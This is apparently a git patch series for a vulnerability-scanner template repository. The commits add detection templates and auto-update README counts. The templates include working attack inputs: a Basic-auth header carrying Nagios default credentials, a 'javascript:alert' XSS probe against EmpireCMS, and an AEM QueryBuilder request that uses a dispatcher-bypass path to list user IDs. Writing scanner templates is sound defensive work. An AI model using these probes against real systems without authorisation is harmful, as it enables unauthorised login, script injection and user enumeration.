From 9057a617e4359684b50229f5fcc24a457deb35f2 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 5 Apr 2021 00:04:52 +0000 Subject: [PATCH 01/13] Update general-tokens.yaml proposed fix for false positives related to the presence of `keyup`, `keydown`, and `keypress` in the response body. --- exposed-tokens/generic/general-tokens.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index db7cff9ef8..1c51bc28d4 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -2,7 +2,7 @@ id: generic-tokens info: name: Generic Tokens - author: nadino + author: nadino & geeknik severity: info tags: token @@ -12,6 +12,11 @@ requests: - '{{BaseURL}}' matchers-condition: and matchers: + - type: regex + part: body + regex: + - (K|k)ey(up|down|press) + negativee: true - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) From d12e30354e192bc1bf11bd8ae3a0613b396632e7 Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Mon, 5 Apr 2021 05:10:34 +0100 Subject: [PATCH 02/13] create nagios-default-creds.yaml --- .../nagios/nagios-default-creds.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 default-logins/nagios/nagios-default-creds.yaml diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-creds.yaml new file mode 100644 index 0000000000..07c746c84a --- /dev/null +++ b/default-logins/nagios/nagios-default-creds.yaml @@ -0,0 +1,29 @@ + +id: Nagios-default-credentials + +info: + name: Nagios Default Password + author: "@iamthefrogy" + severity: high + tags: nagios + +# Nagios Core formerly known as Nagios, is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. +# An attacker can gain a lot of information about the infra from looking at the server status and logs. + +requests: + - method: GET + path: + - "{{BaseURL}}/nagios/side.php" + headers: + Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'Current Status' + - 'Reports' + condition: and From d789177b066f8cb579c928f957034eaa0703c7ca Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 5 Apr 2021 08:16:27 +0000 Subject: [PATCH 03/13] Create empirecms-xss.yaml --- vulnerabilities/other/empirecms-xss.yaml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/empirecms-xss.yaml diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml new file mode 100644 index 0000000000..c47f4ad129 --- /dev/null +++ b/vulnerabilities/other/empirecms-xss.yaml @@ -0,0 +1,26 @@ +id: empirecms-xss + +info: + name: EmpireCMS v75 XSS + author: pikpikcu + severity: medium + reference: https://www.geek-share.com/detail/2777280260.html + tags: empirecms,xss + + +requests: + - method: GET + path: + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(/1337/)" + + matchers-condition: and + matchers: + + - type: word + words: + - 'onmousewheel=\"return bbimg(this)\"' + condition: and + + - type: status + status: + - 200 From cdf0da4cd8fa51820cbfc917425d0e911fe9b897 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:37:34 +0530 Subject: [PATCH 04/13] minor fix --- exposed-tokens/generic/general-tokens.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index 1c51bc28d4..33df4a717b 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -16,7 +16,8 @@ requests: part: body regex: - (K|k)ey(up|down|press) - negativee: true + negative: true + - type: dsl dsl: - regex("TOKEN[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) From 6a35e79f17e1943f83290477daba8e01bcb1f669 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:46:24 +0530 Subject: [PATCH 05/13] minor changes --- default-logins/nagios/nagios-default-creds.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-creds.yaml index 07c746c84a..998433526c 100644 --- a/default-logins/nagios/nagios-default-creds.yaml +++ b/default-logins/nagios/nagios-default-creds.yaml @@ -1,14 +1,11 @@ - -id: Nagios-default-credentials +id: nagios-default-credentials info: - name: Nagios Default Password - author: "@iamthefrogy" + name: Nagios Default Credentials Check + author: iamthefrogy severity: high - tags: nagios - -# Nagios Core formerly known as Nagios, is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved. -# An attacker can gain a lot of information about the infra from looking at the server status and logs. + tags: nagios,default-login + reference: https://www.nagios.org requests: - method: GET @@ -26,4 +23,4 @@ requests: words: - 'Current Status' - 'Reports' - condition: and + condition: and \ No newline at end of file From 46512a0e255a0e637f0326e6fd23eba92d87fa5c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:49:26 +0530 Subject: [PATCH 06/13] misc changes --- .../{nagios-default-creds.yaml => nagios-default-credential.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename default-logins/nagios/{nagios-default-creds.yaml => nagios-default-credential.yaml} (100%) diff --git a/default-logins/nagios/nagios-default-creds.yaml b/default-logins/nagios/nagios-default-credential.yaml similarity index 100% rename from default-logins/nagios/nagios-default-creds.yaml rename to default-logins/nagios/nagios-default-credential.yaml From 0b781b3e4437e247e42c2bf28e7a12cc425c927c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 16:20:29 +0000 Subject: [PATCH 07/13] Auto Update README [Mon Apr 5 16:20:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 246a72f744..aa5939a5f3 100644 --- a/README.md +++ b/README.md @@ -40,10 +40,10 @@ An overview of the nuclei template directory including number of templates assoc | cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | -| default-logins | 20 | exposed-tokens | 9 | dns | 8 | +| default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**80 directories, 881 files**. +**81 directories, 882 files**. From 57650a8ed3f1bf89c7fc42a15f205af88d1a8d74 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 21:51:03 +0530 Subject: [PATCH 08/13] minor fix Removing unrelated template from workflow --- workflows/vbulletin-workflow.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/workflows/vbulletin-workflow.yaml b/workflows/vbulletin-workflow.yaml index 0042ac8e58..ddf77dc573 100644 --- a/workflows/vbulletin-workflow.yaml +++ b/workflows/vbulletin-workflow.yaml @@ -17,5 +17,4 @@ workflows: - name: vbulletin subtemplates: - template: cves/2019/CVE-2019-16759.yaml - - template: cves/2019/CVE-2019-6340.yaml - template: cves/2020/CVE-2020-12720.yaml From e934241101620bb6855c823caf276ebdac6b6b29 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 22:13:16 +0530 Subject: [PATCH 09/13] Update empirecms-xss.yaml --- vulnerabilities/other/empirecms-xss.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml index c47f4ad129..9ccb638846 100644 --- a/vulnerabilities/other/empirecms-xss.yaml +++ b/vulnerabilities/other/empirecms-xss.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(/1337/)" + - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" matchers-condition: and matchers: @@ -19,7 +19,6 @@ requests: - type: word words: - 'onmousewheel=\"return bbimg(this)\"' - condition: and - type: status status: From ed8359cf2a0f8f99bdae6efd2ebd7c3eaf65101c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 16:44:30 +0000 Subject: [PATCH 10/13] Auto Update README [Mon Apr 5 16:44:30 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index aa5939a5f3..09e1bea57c 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 267 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**81 directories, 882 files**. +**81 directories, 883 files**. From 3f954de84dcd8ddf02905892807e18537b21b18b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 17:08:45 +0000 Subject: [PATCH 11/13] Auto Update README [Mon Apr 5 17:08:45 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 09e1bea57c..10e7f18b89 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 267 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | -| misconfiguration | 55 | workflows | 26 | miscellaneous | 19 | +| misconfiguration | 54 | workflows | 26 | miscellaneous | 19 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**81 directories, 883 files**. +**82 directories, 884 files**. From 477a78379040e01a9bc40712a00ce71c1b69e371 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 5 Apr 2021 22:45:48 +0530 Subject: [PATCH 12/13] Added aem-jcr-querybuilder --- .../aem/aem-jcr-querybuilder.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 misconfiguration/aem/aem-jcr-querybuilder.yaml diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml new file mode 100644 index 0000000000..3dfcd291c4 --- /dev/null +++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml @@ -0,0 +1,31 @@ +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' \ No newline at end of file From 8c3326b63bb1d28067545c6164d2f3081c81c847 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 5 Apr 2021 17:16:09 +0000 Subject: [PATCH 13/13] Auto Update README [Mon Apr 5 17:16:09 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 10e7f18b89..87f815bb21 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ An overview of the nuclei template directory including number of templates assoc | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 884 files**. +**82 directories, 885 files**.